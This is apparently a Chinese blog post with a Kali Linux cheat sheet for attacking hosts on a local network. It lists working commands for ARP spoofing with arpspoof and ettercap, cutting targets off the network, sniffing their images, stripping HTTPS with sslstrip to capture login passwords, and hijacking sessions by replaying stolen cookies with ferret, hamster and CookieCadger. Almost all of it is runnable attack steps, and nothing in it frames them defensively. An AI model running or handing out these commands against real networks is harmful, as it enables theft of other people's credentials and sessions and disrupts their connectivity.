• 局域网-断网&劫持(kali)


    1.查看局域网中的主机

    fping –asg 192.168.1.0/24

    2.断网

    arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    (arpspoof  -i 网卡 -t 目标IP 网关)

    3.流量劫持

    echo 1 >/proc/sys/net/ipv4/ip_forward

    (echo空格1空格>)

    arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    4.图片嗅探

    (1)方法1(实验不成功)

    echo 1 >/proc/sys/net/ipv4/ip_forward

    arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    driftnet -i wlan0

    (原因分析:可能丢包原因吧)

    (2)方法2(成功)

    sudo ettercap -i wlan0  -T -M arp:remote /192.168.1.253//192.168.1.100/ 

    driftnet -i wlan0

    (图片文件夹:/tmp/driftnet)

    Ubuntu下可以安装工具:

    sudo apt-get install  ettercap-text-only

    sudo apt-get install driftnet

     )

    5.http登录账号密码嗅探

    echo 1 >/proc/sys/net/ipv4/ip_forward

    arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    ettercap -Tq -i wlan0 

    (信息太庞杂,可以使用 ettercap -Tq -i wlan0 >test方便查找)

    6.https登录账号密码嗅探

    vim /etc/ettercap.conf

    # if you use iptables:

       #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

       #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    修改为

    # if you use iptables:

       redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    sslstrip -a -f -k

    echo 1 >/proc/sys/net/ipv4/ip_forward

    arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    ettercap -Tq -i wlan0 

    7.会话劫持

    (1)方法1

    arpspoof  

    wireshark        -->抓包

    ferret         --。重新生成抓包后的文件

    hamster       -- > 重放流量

    $echo 1 >/proc/sys/net/ipv4/ip_forward

    $arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    $wireshark

    wireshark 保存为.pcap文件

    $ferret -r cookie.pcap

    将生成的txt文件放到用户目录下

    $hamster

    配置代理

    访问127.0.0.1:1234(上一步的代理)

    (2)方法2

    $echo 1 >/proc/sys/net/ipv4/ip_forward

    $arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    $ferret -i wlan0

    $hamster

    (3)方法3

    $echo 1 >/proc/sys/net/ipv4/ip_forward

    $arpspoof -i wlan0 -t 192.168.100 192.168.1.1

    CookieCadger-1.08.jar

  • 相关阅读:
    UCML破解
    UCML快速开发平台学习1-UCML环境安装
    window系统安装jdk,jre
    解决Android报错No resource found that matches the given name (at 'text' with value '@string/hello').
    es6小技巧整理
    如何将项目推到github上面
    如何将时间格式化
    uni-app 页面跳转的两种方法
    layui表单校验及监听复选框选中状态的坑
    使用nvm管理多个不同版本的nodeJS之安装成功nodeJs之后使用npm报错的问题
  • 原文地址:https://www.cnblogs.com/yaolei/p/4763334.html
Copyright © 2020-2023  润新知